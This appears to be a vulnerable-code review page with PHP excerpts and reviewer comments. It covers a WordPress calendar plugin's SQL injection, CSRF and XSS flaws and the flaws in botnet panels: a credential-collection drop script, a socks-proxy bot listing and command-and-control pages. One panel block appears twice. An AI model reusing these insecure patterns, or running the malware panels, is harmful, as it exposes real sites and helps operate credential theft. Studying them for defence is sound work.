Popular Vulnerable Code

Boundaries

I like pushing boundaries.
Lady Gaga

...snip...
   
</style>
<?php
 // We do some checking to see what we're doing
 //
 // Category admin handler for the WP Calendar "categories" page. One branch per
 // request "mode": add (POST), delete (GET), show edit form (GET), save edit
 // (POST). Every branch builds its SQL by concatenating request values.
 //
 // NOTE(review): no capability check or nonce verification (check_admin_referer()
 // / wp_nonce_field()) is visible in this excerpt. It may exist above the snip;
 // as shown, each branch acts on the bare request, so a cross-site forged
 // request would be honoured (CSRF).
 // NOTE(review): the literals "SET ..." / "WHERE ..." have no leading space after
 // the table-name constant. That may be an artefact of how this listing was
 // extracted (attribute spaces in the HTML below are missing too) — confirm
 // against the original source before calling it a bug.
 if (isset($_POST['mode']) && $_POST['mode'] == 'add')
  {
   // Proceed with the save  
   // category_name / category_colour are run through mysql_escape_string() and
   // land inside single-quoted literals. That function is the deprecated,
   // connection/charset-unaware escaper; $wpdb->prepare() with %s placeholders
   // is the supported way to bind these values.
   $sql = "INSERT INTO " . WP_CALENDAR_CATEGORIES_TABLE . "SET category_name='".mysql_escape_string($_POST['category_name'])."',category_colour='".mysql_escape_string($_POST['category_colour'])."'";
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category added successfully','calendar')."</strong></p></div>";
  }
 else if (isset($_GET['mode']) && isset($_GET['category_id']) && $_GET['mode'] == 'delete')
  {
   // category_id is escaped but interpolated UNQUOTED. mysql_escape_string()
   // only neutralises quote/backslash/NUL characters, which does nothing in a
   // bare numeric position — the value is effectively unfiltered here. Cast to
   // int (or bind with $wpdb->prepare('... = %d', ...)) instead. Same pattern on
   // the UPDATE below and on the SELECT in the edit branch.
   $sql = "DELETE FROM " . WP_CALENDAR_CATEGORIES_TABLE . "WHERE category_id=".mysql_escape_string($_GET['category_id']);
   $wpdb->get_results($sql);
   // Re-points events of the deleted category at category 1 (presumably the
   // default category).
   $sql = "UPDATE " . WP_CALENDAR_TABLE . "SET event_category=1 WHERE event_category=".mysql_escape_string($_GET['category_id']);
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category deleted successfully','calendar')."</strong></p></div>";
  }
 else if (isset($_GET['mode']) && isset($_GET['category_id']) && $_GET['mode'] == 'edit' && !isset($_POST['mode']))
  {
   // Loads the category to pre-fill the edit form; category_id is unquoted in
   // the WHERE clause here as well (see the delete branch).
   $sql = "SELECT * FROM " . WP_CALENDAR_CATEGORIES_TABLE . "WHERE category_id=".mysql_escape_string($_GET['category_id']);
   $cur_cat = $wpdb->get_row($sql);
   // The form below echoes $cur_cat->category_id / category_name /
   // category_colour into value="" attributes after stripslashes() only — no
   // esc_attr(). A stored name containing a double quote breaks out of the
   // attribute (stored XSS, reachable through the add/edit branches).
   // Also: bloginfo() prints its value itself and returns nothing, so the
   // `echo bloginfo('wpurl')` in the form action relies on that side effect.
   ?>
<div class="wrap">
  <h2><?php _e('Edit Category','calendar'); ?></h2>
  <form name="catform"id="catform"class="wrap"method="post"action="<?php echo bloginfo('wpurl'); ?>/wp-admin/admin.php?page=calendar-categories">
        <input type="hidden"name="mode"value="edit"/>
        <input type="hidden"name="category_id"value="<?php echo stripslashes($cur_cat->category_id) ?>"/>
        <div id="linkadvanceddiv"class="postbox">
            <div style="float:left;width:98%;clear:both;"class="inside">
    <table cellpadding="5"cellspacing="5">
                <tr>
    <td><legend><?php _e('Category Name','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_name"class="input"size="30"maxlength="30"value="<?php echo stripslashes($cur_cat->category_name) ?>"/></td>
    </tr>
                <tr>
    <td><legend><?php _e('Category Colour (Hex format)','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_colour"class="input"size="10"maxlength="7"value="<?php echo stripslashes($cur_cat->category_colour) ?>"/></td>
                </tr>
                </table>
            </div>
            <div style="clear:both;height:1px;">&nbsp;</div>
        </div>
        <input type="submit"name="save"class="button bold"value="<?php _e('Save','calendar'); ?> &raquo;"/>
  </form>
</div>
   <?php
  }
 else if (isset($_POST['mode']) && isset($_POST['category_id']) && isset($_POST['category_name']) && isset($_POST['category_colour']) && $_POST['mode'] == 'edit')
  {
   // Proceed with the save
   // Same escaping story as the add branch for the two quoted values; the
   // category_id in the WHERE clause is again unquoted and therefore unfiltered.
   $sql = "UPDATE " . WP_CALENDAR_CATEGORIES_TABLE . "SET category_name='".mysql_escape_string($_POST['category_name'])."',category_colour='".mysql_escape_string($_POST['category_colour'])."' WHERE category_id=".mysql_escape_string($_POST['category_id']);
   $wpdb->get_results($sql);
   echo "<div class=\"updated\"><p><strong>".__('Category edited successfully','calendar')."</strong></p></div>";
  }

 $get_mode = 0;
 $post_mode = 0;
 if (isset($_GET['mode'])) {
  if ($_GET['mode'] == 'edit') {
   $get_mode = 1;
  }
 }
 if (isset($_POST['mode'])) {
  if ($_POST['mode'] == 'edit') {
   $post_mode = 1;
  }
 }
 if ($get_mode != 1 || $post_mode == 1)
  {
?>

 <div class="wrap">
  <h2><?php _e('Add Category','calendar'); ?></h2>
  <form name="catform"id="catform"class="wrap"method="post"action="<?php echo bloginfo('wpurl'); ?>/wp-admin/admin.php?page=calendar-categories">
        <input type="hidden"name="mode"value="add"/>
        <input type="hidden"name="category_id"value="">
        <div id="linkadvanceddiv"class="postbox">
            <div style="float:left;width:98%;clear:both;"class="inside">
       <table cellspacing="5"cellpadding="5">
                <tr>
                <td><legend><?php _e('Category Name','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_name"class="input"size="30"maxlength="30"value=""/></td>
                </tr>
                <tr>
                <td><legend><?php _e('Category Colour (Hex format)','calendar'); ?>:</legend></td>
                <td><input type="text"name="category_colour"class="input"size="10"maxlength="7"value=""/></td>
                </tr>
                </table>
            </div>
      <div style="clear:both;height:1px;">&nbsp;</div>
        </div>
        <input type="submit"name="save"class="button bold"value="<?php _e('Save','calendar'); ?> &raquo;"/>
  </form>
  <h2><?php _e('Manage Categories','calendar'); ?></h2>
...snip...

Floods

The moment we begin to fear the opinions of others and hesitate to tell the truth that is in us, and from motives of policy are silent when we should speak, the divine floods of light and life no longer flow into our souls.
Elizabeth Cady Stanton

<?php

// Collection endpoint. Reads 'id' (GET, falling back to POST), 'info' and
// 'user' (POST), attaches the caller's address and a GeoIP lookup, then stores
// the record either in the MySQL table `pass` or in a daily text file.
//
// Defender notes (what the code shows):
//  * REMOTE_ADDR is the peer address; HTTP_X_FORWARDED_FOR is a request header
//    the client controls, so $real_ip is untrusted free text.
//  * Only $info is processed (decode_string(): hex -> bytes, then addslashes()).
//    $id, $user, $real_ip and $ip go into the INSERT as-is.
//  * DB errors are @-suppressed and execution continues to the next step.
//  * On-disk artefacts this script produces: rows in `pass`, or files named
//    logs/pass.DD.MM.txt with '@@@@@'-separated fields (info, user, id,
//    forwarded-for, remote addr, date, time).
$use_mysql = 1;

if ($use_mysql == 1) {
 require_once('./mysqllog.php');
 require_once('./geoipcity.inc');
}

$ip = getenv("REMOTE_ADDR");
$real_ip = getenv("HTTP_X_FORWARDED_FOR");

// $_POST['id'] is read without isset(): a missing value yields a notice and null.
if (isset($_GET['id'])) {
 $id = $_GET['id'];
} else {
 $id = $_POST['id'];
}

$info = $_POST['info'];
$user = $_POST['user'];

if ($use_mysql == 1) {
 //-----------------------------------
 // GeoIP lookup on the peer address (not on the forwarded-for header).
 $gi = geoip_open('./GeoIPCity.dat', GEOIP_STANDARD);
 $record = geoip_record_by_addr($gi, $ip);
 geoip_close($gi);
 //-----------------------------------
 // decode_string() is defined further down in this file (hoisted by PHP).
 // addslashes() is the only escaping applied, and only to this one field.
 $info = decode_string($info);
 // $mysql_host/$mysql_login/$mysql_pass/$mysql_db are presumably set by
 // mysqllog.php (not shown).
 if(@!mysql_connect($mysql_host,$mysql_login,$mysql_pass)) {echo '<p class="err">Error. Cant connect to mysql server </p>'; }
 if(@!mysql_selectdb($mysql_db)) {echo '<p class="err">Error. Cant connect to DB</p>'; }
 // String-built INSERT: $id, $user, $real_ip, $ip and $record->* are
 // interpolated with no escaping at all; a parameterised query (or at minimum
 // mysql_real_escape_string() on each value) would be required here.
 $query = 'INSERT INTO pass (add_date,id,uidlog,ip_real,ip,pass,country,city,zip)
    VALUES (now(),"'
. $id . '","'. $user .'","'. $real_ip . '","'. $ip .'","'. $info .'","'. $record->country_name .'","'. $record->city .'","'. $record->postal_code .'")';
 if(@!mysql_query($query)) {echo '<p class="err">Error. Cant execute query</p>';  }
}
else {
 // File fallback. $info is NOT decoded on this path (decode_string() is only
 // called in the MySQL branch), so the raw submitted value is logged.
 $date = date("Y-m-d");
 $time=date("H:i:s");
 
 list($year, $month, $day) = explode('-', $date);
 $filename = "pass.$day.$month.txt";
 $log = "$info@@@@@$user@@@@@$id@@@@@$real_ip@@@@@$ip@@@@@$date@@@@@$time\n";
 // fopen() return value is not checked; fputs() on false would only warn.
 $fh = fopen("logs/$filename", "a+");
 fputs($fh, $log);  
 fclose($fh);
}

// Turn a hex string (two hex digits per byte) back into bytes and return it
// addslashes()-escaped. An odd trailing digit is decoded as a single-digit
// value, and non-hex characters are ignored by hexdec().
function decode_string($string) {
  $decoded = '';
  $length = strlen($string);
  $offset = 0;
  while ($offset < $length) {
    $pair = substr($string, $offset, 2);
    $decoded .= chr(hexdec($pair));
    $offset += 2;
  }
  return addslashes($decoded);
}
?>

Grammys

The last thing I want is to walk into my house after a long day and see all the Grammys and awards. It would make me feel weird.
Alicia Keys

<?php

include_once('geoipcity.inc');
include_once('../mysqllog.php');

// Listing page: renders two filter forms (country / US state) and then a table
// of rows from `socks` updated in the last 24 hours, one row per entry via
// printent() (defined below this block).
//
// Defender notes (what the code shows):
//  * $_POST['countrys'] / $_POST['states'] are echoed straight back into the
//    page (the "Current country/state selected" line) with no htmlspecialchars()
//    -> reflected XSS. They are only defaulted to "all" when empty.
//  * `or die(mysql_error())` sends raw DB error text to the browser.
//  * No access control is visible in this file; if any exists it lives elsewhere.
$countrys = $_POST['countrys'];
$states = $_POST['states'];

if ($countrys == "") {
 $countrys = "all";
}
if ($states == "") {
 $states = "all";
}

// $month/$day are computed but not used anywhere in this block.
$date = date("m-d");
list($month, $day) = explode('-', $date);


print "<STYLE><!-- a:link{color:#404040;text-decoration:none}  a:visited{color:#909090;text-decoration:none}  a:active{color:#000000;text-decoration:none}  a:hover{color:#000000;text-decoration:none}  input{BACKGROUND-COLOR:#66CF96;BORDER-BOTTOM:#ffffff 1px solid;BORDER-LEFT:#ffffff 1px solid;BORDER-RIGHT:#ffffff 1px solid;BORDER-TOP:#ffffff 1px solid;COLOR:#000000;FONT-FAMILY:Tahoma,sans-serif;FONT-SIZE:12px}  --></STYLE>
  <BODY bgcolor=#DDDDDD text=#505050 marginwidth=0><table align=center border=1><TD><form action=index.php method=post><B>Select by country</B><TD><select name=countrys><option value=all>All countries"
;

// $GEOIP_COUNTRY_CODES / $GEOIP_COUNTRY_NAMES come from geoipcity.inc; the loop
// starts at index 1 and stops at the first empty code.
$j = 1;
while ($GEOIP_COUNTRY_CODES[$j] != "") {
 print "<option value=$GEOIP_COUNTRY_CODES[$j]>$GEOIP_COUNTRY_NAMES[$j]\r\n";
 $j++;
}

print "</SELECT><TD><BR><INPUT type=submit value=submit></FORM><TR><TD>
  <FORM action=index.php method=post><B>Select by state</B><TD><select name=states><option value=all>all<option value=AK>AK<option value=AL>AL<option value=AR>AR<option value=AS>AS<option value=AZ>AZ<option value=CA>CA<option value=CO>CO
  <option value=CT>CT<option value=DC>DC<option value=DE>DE<option value=FL>FL<option value=GA>GA<option value=HI>HI<option value=IA>IA<option value=ID>ID<option value=IL>IL<option value=IN>IN
  <option value=KS>KS<option value=KY>KY<option value=LA>LA<option value=MA>MA<option value=MD>MD<option value=ME>ME<option value=MI>MI<option value=MN>MN<option value=MO>MO<option value=MP>MP
  <option value=MS>MS<option value=MT>MT<option value=NC>NC<option value=ND>ND<option value=NE>NE<option value=NH>NH<option value=NJ>NJ<option value=NM>NM<option value=NV>NU<option value=NY>NY
  <option value=OH>OH<option value=OK>OK<option value=OR>OR<option value=PA>PA<option value=PR>PR<option value=RI>RI<option value=SC>SC<option value=SD>SD<option value=TN>TN<option value=TX>TX
  <option value=UT>UT<option value=VA>VA<option value=VI>VI<option value=VT>VT<option value=WA>WA<option value=WI>WI<option value=WV>WV<option value=WY>WY</select>
  <TD><BR><input type=submit value=submit></form></table><B><CENTER><BR>Current country selected:$countrys<BR>Current state selected:$states</CENTER></B><BR>
  <table width=100% cellspacing=0><tr><td><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=center bgcolor=#66CF96><b>List</b></td></tr></table></td></tr>
  <tr><td><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=center bgcolor=#66CF96>IP</td><td align=center bgcolor=#66CF96>UPDATE</td><td align=center bgcolor=#66CF96>ID</td>
  <td align=center bgcolor=#66CF96>COUNTRY</td>
  <td align=center bgcolor=#66CF96>CITY</td>
  <td align=center bgcolor=#66CF96>STATE</td>
  <td align=center bgcolor=#66CF96>UPTIME</td></tr>"
;
   

// Window = now minus one day. mktime() with no arguments is a deprecated
// spelling of time().
$stime = mktime();
$stime = $stime - 86400;
// Connection parameters are presumably set by ../mysqllog.php (not shown).
$link = mysql_connect($mysql_host, $mysql_login, $mysql_pass) or die("Could not connect:" . mysql_error());
mysql_select_db($mysql_db, $link) or die("Could not select:" . mysql_error());
// $stime is a server-computed integer, so this query carries no request data.
$query = 'SELECT * FROM `socks` WHERE `update` >' . $stime . ' ORDER BY `update` DESC';
$result = mysql_query($query, $link) or die("Could not execute:" . mysql_error());

// Positional parameter array handed to printent():
//   0 ip, 1 hport, 2 sport, 3 update (unix time, see printent's date() call),
//   4 uptime, 5 uid, 6 used.
$tot = 0;
while ($row = mysql_fetch_assoc($result)) {
 $prms[0] = $row['ip'];
 $prms[1] = $row['hport'];
 $prms[2] = $row['sport'];
 $prms[3] = $row['update'];
 $prms[4] = $row['uptime'];
 $prms[5] = $row['uid'];
 $prms[6] = $row['used'];
 // Rows with an empty ip are neither rendered nor counted.
 if ($prms[0] != "") {
  printent($prms,$tot,$countrys,$states);
  $tot++;
 }
}
mysql_close($link);

print "</table><table width=100% bgcolor=#FFFFFF cellspacing=1><tr><td align=right bgcolor=#66CF96>Total:<b>$tot</b></tr></td></table></table></table></tr></td></TABLE></BODY></HTML>";

function printent($prms,$tot,$countrys,$states){
 if(!($tot%2)) {
  $bcolor="#D6D6D6";
 } else {
  $bcolor="#98E8E1";
 }
 
 $tid = $prms[5];
 $tid = chop($tid);
 
 $gi = geoip_open("../GeoIPCity.dat",GEOIP_STANDARD);
 $record = geoip_record_by_addr($gi,$prms[0]);
 geoip_close($gi);

 if (($countrys == "all") & ($states == "all")) {
  echo "<tr>\r\n";
  echo "<td align=left bgcolor=$bcolor onClick=\"window.open('check.php?ip=$prms[0]&port=$prms[2]&hport=$prms[1]','child','scrollbars=no,width=250,height=100');\" onmouseover=\"this.style.background='#000D2A';\" onmouseout=\"this.style.background='$bcolor';\"><font face='Fixedsys' color=#707070><INPUT type=button value=\"Copy IP\" onclick=window.clipboardData.setData(\"Text\",\"$prms[0]\")>$prms[0]</font></td>\r\n";
  echo "<td align=center bgcolor=$bcolor><font face='Fixedsys' color=#707070>" . date("H:i:s d.m.y", $prms[3]) ."</font></td>\r\n";//socks
  echo "<td align=center bgcolor=$bcolor><font face='Fixedsys' color=#707070><INPUT type=button value=\"Copy ID\" onclick=window.clipboardData.setData(\"Text\",\"$tid\")>&nbsp;$tid</font></td>\r\n";//socks

  // Show flag
  if ($record->country_code == "") {
   $record->country_code = "-";
   $record->country_name = "";
  }

  $c_code = strtolower($record->country_code);
  
  $flag = "<IMG src=../flags/$c_code.gif>&nbsp;$record->country_name.<BR>";
  
  echo "<td align=left bgcolor=$bcolor><font face='Fixedsys' color=#707070>$flag</font></td>\r\n";

Writing – Fake XSS + CSRF

Details

Affected Software: EOF-0×01 Command and Control

Fixed in Version: ?

Issue Type: XSS and XSRF

Original Code: Found Here

Details

This week, we had a couple of bugs here affecting EOF-0×01 Command and Control. A red herring is the use of echo($_POST['pw']); to build HTML markup. Upon first glance, this seems like a straightforward XSS bug. This issue is mitigated by the fact that $_POST['pw'] is only displayed if it is equal to $botpw (whose default value happens to be 'bla'). So unless the botmaster has an XSS payload for their password, this one is going to be really difficult to exploit. The other interesting part is the if statements that look at $_POST['action']. If the user has provided the correct $_POST['pw'] and also provides a $_POST['action'] of 2 or 3, DeleteCommandsFromQueue() and EditCommandForBot() will be executed respectively. Developers (even malware developers) should be wary of allowing Create, Update, or Delete operations without defending against cross-site request forgery. These functions are not protected.

Vulnerable Code

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type"content="text/html;charset=iso-8859-1">

<?php
include("./config.php");
include("./functions.php");

// Parses the raw query string INTO THE CURRENT SCOPE: with no second argument
// parse_str() creates one variable per URL parameter, the same effect as the
// old register_globals. Any variable config.php just set — including the
// $server/$user/$pw/$dbname handed to ConnectToDB() below — can be overridden
// by a request parameter of the same name. Use the output-array form,
// parse_str($query, $params), and read from $params explicitly.
$query = $_SERVER['QUERY_STRING'];
parse_str($query);

// ConnectToDB() is presumably from functions.php; its credentials come from
// the globals above.
ConnectToDB($server, $user, $pw, $dbname);
?>

<style type="text/css">
<!--
@import url("./style.css");
-->
</style>

<script>
<!--
// Run from <body onload>: put the cursor in the command box and scroll the
// log field to its end.
function setfocus()
{
 var form = document.form1;
 form.cmd.focus();
 form.logfield.scrollTop = '9999';
}
-->
</script>

</head>

<body onload="setfocus()">
<?php
if($_POST['pw']!=$botpw)
{
?>
<table width="242"border="0"cellpadding="0"cellspacing="0"bgcolor="#D0EAD2"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td width="239"height="44"valign="top"><form action="./control.php"method="post"name="login"id="login">
    Password:<br>
    <input name="pw"type="password"id="pw">
    <input name="login"type="submit"id="login"value="Login">
  </form></td>
 </tr>
</table>
<?php
}
else
{
?>
<table width="516"border="0"cellpadding="0"cellspacing="0"bgcolor="#D5E1F0"class="tableborder">
    <!--DWLayoutTable-->
    <tr>
     <td width="78"height="43"valign="middle"><form action="./control.php"method="post"name="logout"id="logout">
       <input name="logout"type="submit"id="logout"value="Logout">
     </form></td>
     <td width="143"valign="middle"><form action="./control.php"method="post"name="command"id="command">
       <input name="command"type="submit"id="command"value="Command center">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
   <td width="193"valign="middle"><form action="./control.php"method="post"name="queue"id="queue">
       <input name="queue"type="submit"id="queue"value="Manage commandqueue">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
     <td width="101"valign="middle"><form action="./control.php"method="post"name="logdel"id="logdel">
       <input name="logdel"type="submit"id="logdel"value="Delete log">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
    </tr>
</table>
<?php
if(isset($_POST['queue']))
{

// Dispatch on the 'action' field. Both branches perform state-changing writes
// (delete / edit of the command queue) on the strength of the password check
// alone; no CSRF token or origin check is visible in this excerpt, which is the
// cross-site request forgery the write-up above describes. The loose == also
// matches "2.0", " 2", etc.
// NOTE(review): the write-up names actions 2 and 3; the code dispatches on 2
// and 4 (3 is only tested by the display condition that follows this block).
if(isset($_POST['action']))
{
 if($_POST['action']==2)
 {
  DeleteCommandsFromQueue();  
 }
 
 if($_POST['action']==4)
 {
  EditCommandForBot();  
 }
}

if($_POST['action']!=3)
{
?>
<br>
<form action="./control.php"method="post"name="form1"id="form1">
<table width="648"border="0"cellpadding="0"cellspacing="0"bgcolor="#F2ECD7"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td height="486"colspan="2"valign="top">Bot:<br>
     <select name="botselect"id="botselect">
   <?php
   ShowAllBotsCmdList();
   ?>
    </select>

Writing

Writing is a struggle against silence.
Carlos Fuentes

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title></title>
<meta http-equiv="Content-Type"content="text/html;charset=iso-8859-1">

<?php
include("./config.php");
include("./functions.php");

// Parses the raw query string INTO THE CURRENT SCOPE: with no second argument
// parse_str() creates one variable per URL parameter, the same effect as the
// old register_globals. Any variable config.php just set — including the
// $server/$user/$pw/$dbname handed to ConnectToDB() below — can be overridden
// by a request parameter of the same name. Use the output-array form,
// parse_str($query, $params), and read from $params explicitly.
$query = $_SERVER['QUERY_STRING'];
parse_str($query);

// ConnectToDB() is presumably from functions.php; its credentials come from
// the globals above.
ConnectToDB($server, $user, $pw, $dbname);
?>

<style type="text/css">
<!--
@import url("./style.css");
-->
</style>

<script>
<!--
// Run from <body onload>: put the cursor in the command box and scroll the
// log field to its end.
function setfocus()
{
 var form = document.form1;
 form.cmd.focus();
 form.logfield.scrollTop = '9999';
}
-->
</script>

</head>

<body onload="setfocus()">
<?php
if($_POST['pw']!=$botpw)
{
?>
<table width="242"border="0"cellpadding="0"cellspacing="0"bgcolor="#D0EAD2"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td width="239"height="44"valign="top"><form action="./control.php"method="post"name="login"id="login">
    Password:<br>
    <input name="pw"type="password"id="pw">
    <input name="login"type="submit"id="login"value="Login">
  </form></td>
 </tr>
</table>
<?php
}
else
{
?>
<table width="516"border="0"cellpadding="0"cellspacing="0"bgcolor="#D5E1F0"class="tableborder">
    <!--DWLayoutTable-->
    <tr>
     <td width="78"height="43"valign="middle"><form action="./control.php"method="post"name="logout"id="logout">
       <input name="logout"type="submit"id="logout"value="Logout">
     </form></td>
     <td width="143"valign="middle"><form action="./control.php"method="post"name="command"id="command">
       <input name="command"type="submit"id="command"value="Command center">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
   <td width="193"valign="middle"><form action="./control.php"method="post"name="queue"id="queue">
       <input name="queue"type="submit"id="queue"value="Manage commandqueue">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
     <td width="101"valign="middle"><form action="./control.php"method="post"name="logdel"id="logdel">
       <input name="logdel"type="submit"id="logdel"value="Delete log">
       <input name="pw"type="hidden"id="pw"value="<?php echo($_POST['pw']); ?>">
     </form></td>
    </tr>
</table>
<?php
if(isset($_POST['queue']))
{

// Dispatch on the 'action' field. Both branches perform state-changing writes
// (delete / edit of the command queue) on the strength of the password check
// alone; no CSRF token or origin check is visible in this excerpt, which is the
// cross-site request forgery the write-up above describes. The loose == also
// matches "2.0", " 2", etc.
// NOTE(review): the write-up names actions 2 and 3; the code dispatches on 2
// and 4 (3 is only tested by the display condition that follows this block).
if(isset($_POST['action']))
{
 if($_POST['action']==2)
 {
  DeleteCommandsFromQueue();  
 }
 
 if($_POST['action']==4)
 {
  EditCommandForBot();  
 }
}

if($_POST['action']!=3)
{
?>
<br>
<form action="./control.php"method="post"name="form1"id="form1">
<table width="648"border="0"cellpadding="0"cellspacing="0"bgcolor="#F2ECD7"class="tableborder">
 <!--DWLayoutTable-->
 <tr>
  <td height="486"colspan="2"valign="top">Bot:<br>
     <select name="botselect"id="botselect">
   <?php
   ShowAllBotsCmdList();
   ?>
    </select>

Imagination

I am enough of an artist to draw freely upon my imagination. Imagination is more important than knowledge. Knowledge is limited. Imagination encircles the world.
Albert Einstein

<?php if(!defined('__INDEX__'))die();
// Bot-command management page (included from an index that defines __INDEX__).
// Three GET-driven actions (new/edit, del, res) followed by the list view.
// $pedt is non-zero when the PRIV bitmask carries the "edit commands" bit;
// view-only users reach the form and the list but not the write paths.
$pedt=PRIV&PRIV_BOTS_CMDS_EDIT;
// 'edit' is accepted for anyone (view), 'new' only with the edit privilege.
// is_numeric() is the only filter on $_GET['edit']; it also accepts signs,
// decimals, exponents and leading whitespace, so an (int) cast is the tighter
// check before the value reaches SQL further down.
if((isset($_GET['new'])&&$pedt)||(isset($_GET['edit'])&&is_numeric($_GET['edit'])))
{
 // @ hides the include failure; the die() message is the only signal.
 if(!@include_once('fmt.php'))die('fmt.php not founded!');
 // Form fields, defaulted when absent. Only 'limit' is validated (is_numeric);
 // name/cnts/cids/bns/cmds are taken as submitted.
 $name=isset($_POST['name'])?$_POST['name']:time();
 $stat=isset($_POST['stat'])?($_POST['stat']?1:0):0;
 $limit=(isset($_POST['limit'])&&is_numeric($_POST['limit']))?$_POST['limit']:0;
 $cnts=isset($_POST['cnts'])?$_POST['cnts']:'';
 $cids=isset($_POST['cids'])?$_POST['cids']:'';
 $bns=isset($_POST['bns'])?$_POST['bns']:'';
 $cmds=isset($_POST['cmds'])?$_POST['cmds']:'';

 // Save path: POST + non-empty name + edit privilege.
 if($_SERVER['REQUEST_METHOD']=='POST'&&strlen($name)>0&&$pedt)
 {
  $cmdsb=EncodeBuffer(str_replace("\r\n","\n",trim($cmds)));
  // SQL SET list escaped with addslashes() only. addslashes() is not a SQL
  // escaper (it knows nothing about the connection charset); with ext/mysql the
  // correct call is mysql_real_escape_string(). $limit is unquoted but was
  // is_numeric()-checked above.
  $data='name=\''.addslashes($name).'\',stat='.$stat.',lim='.$limit.',c=\''.addslashes(SepFmt($cnts)).'\',comps=\''.addslashes(SepFmt($cids)).'\',bns=\''.addslashes(SepFmt($bns)).'\',cmds=\''.addslashes($cmdsb).'\'';
  // $_GET['edit'] passed is_numeric() and is placed inside quotes here.
  if(isset($_GET['new']))mysql_query('INSERT INTO '.TABLE_BCMDS.' SET '.$data.',id2='.time());
  else mysql_query('UPDATE '.TABLE_BCMDS.' SET '.$data.' WHERE id=\''.$_GET['edit'].'\' LIMIT 1');
  // Redirect back to the list; the query result is never checked.
  header('Location:'.QUERY_STRING);
 }
 else
 {
  // Render path. A view-only user who requested 'new' is downgraded to the list.
  if(!$pedt&&isset($_GET['new']))unset($_GET['new']);
  HTMLBegin(isset($_GET['new'])?LNG_MBCMDS_NEWCMD:($pedt?LNG_MBCMDS_EDITCMD:LNG_MBCMDS_VIEWCMD));  
  if(isset($_GET['new']))print CmdForm('new',LNG_MBCMDS_NEWCMD,LNG_MBCMDS_ADD,$name,$stat,$limit,$cnts,$cids,$bns,$cmds);
  else
  {
   $r=mysql_query('SELECT * FROM '.TABLE_BCMDS.' WHERE id=\''.$_GET['edit'].'\' LIMIT 1');
   // Relies on mysql_affected_rows() reflecting the SELECT's row count;
   // mysql_num_rows($r) is the explicit call for that.
   if($r&&mysql_affected_rows()==1&&($m=mysql_fetch_assoc($r)))print CmdForm('edit='.$_GET['edit'],$pedt?LNG_MBCMDS_EDITCMD:LNG_MBCMDS_VIEWCMD,$pedt?LNG_MBCMDS_EDIT:'',$m['name'],$m['stat'],$m['lim'],SepFmtB($m['c']),SepFmtB($m['comps']),SepFmtB($m['bns']),DecodeBuffer($m['cmds']));
   else print '<font class="error">'.LNG_MBCMDS_ERROR_1.'</font>';
  }
  HTMLEnd();
 }
 die();
}
// Delete: is_numeric()-checked id interpolated UNQUOTED (see the note on that
// filter above); privileged users only.
else if(isset($_GET['del'])&&is_numeric($_GET['del'])&&$pedt)
{
 mysql_query('DELETE FROM  '.TABLE_BCMDS.' WHERE id='.$_GET['del'].' LIMIT 1');
 header('Location:'.QUERY_STRING);
 die();  
}
// Reset the execution counters of one command; same id handling as delete.
else if(isset($_GET['res'])&&is_numeric($_GET['res'])&&$pedt)
{
 mysql_query('UPDATE '.TABLE_BCMDS.' SET exc=\'0\',rcomps=\'\',exct=\'0\' WHERE id='.$_GET['res'].' LIMIT 1');
 header('Location:'.QUERY_STRING);
 die();
}

// List view. The inline JS helpers DelCmd/ResCmd navigate to &del= / &res= after
// a confirm(); they are only emitted for privileged users.
HTMLBegin(LNG_MBCMDS,$pedt?'function DelCmd(uid,q){if(confirm(q))window.location=\''.QUERY_STRING.'&del=\'+uid};function ResCmd(uid,q){if(confirm(q))window.location=\''.QUERY_STRING.'&res=\'+uid}':'');

$r=mysql_query('SELECT * FROM '.TABLE_BCMDS);    
// Row count via mysql_affected_rows() after a SELECT (see above).
$total=mysql_affected_rows();
print '<table class="tbl1"><tr><td class="td1"colspan="'.($pedt?9:10).'">'.LNG_MBCMDS_R_CMDS.'&nbsp;('.$total.')</td>';
if($pedt)print '<td class="td1"align="center"><input type="submit"value="'.LNG_MBCMDS_NEWCMD.'"class="ism"style="width:100%"onClick="window.location=\''.QUERY_STRING.'&new\';"></td>';
print '</tr><tr><td class="td1">'.LNG_MBCMDS_R_ID.'</td><td class="td1">'.LNG_MBCMDS_R_NAME.'</td><td class="td1">'.LNG_MBCMDS_R_STAT.'</td><td class="td1">'.LNG_MBCMDS_R_LIMIT.'</td><td class="td1">'.LNG_MBCMDS_R_REQ.'</td><td class="td1">'.LNG_MBCMDS_R_EXEC.'</td><td class="td1">'.LNG_MBCMDS_R_CNTS.'</td><td class="td1">'.LNG_MBCMDS_R_CIDS.'</td><td class="td1">'.LNG_MBCMDS_R_BNS.'</td><td class="td1">&nbsp;</td></tr>';
if($total>0)
{
 $j=0;
 while(($m=mysql_fetch_assoc($r)))
 {
  // Alternate row class tdx1 / tdx2.
  $a=(($j++)%2==0?1:2);
  // name and the three list columns go through htmlentities(); id2, lim, exc,
  // exct and id are printed raw (presumably numeric columns — confirm schema).
  print '<tr valign="top"><td align="right"class="tdx'.$a.'">'.$m['id2'].'</td>'.
     '<td class="tdx'.$a.'">'.htmlentities($m['name']).'</td>'.
     '<td class="tdx'.$a.'">'.($m['stat']?LNG_MBCMDS_STAT_ON:LNG_MBCMDS_STAT_OFF).'</td>'.
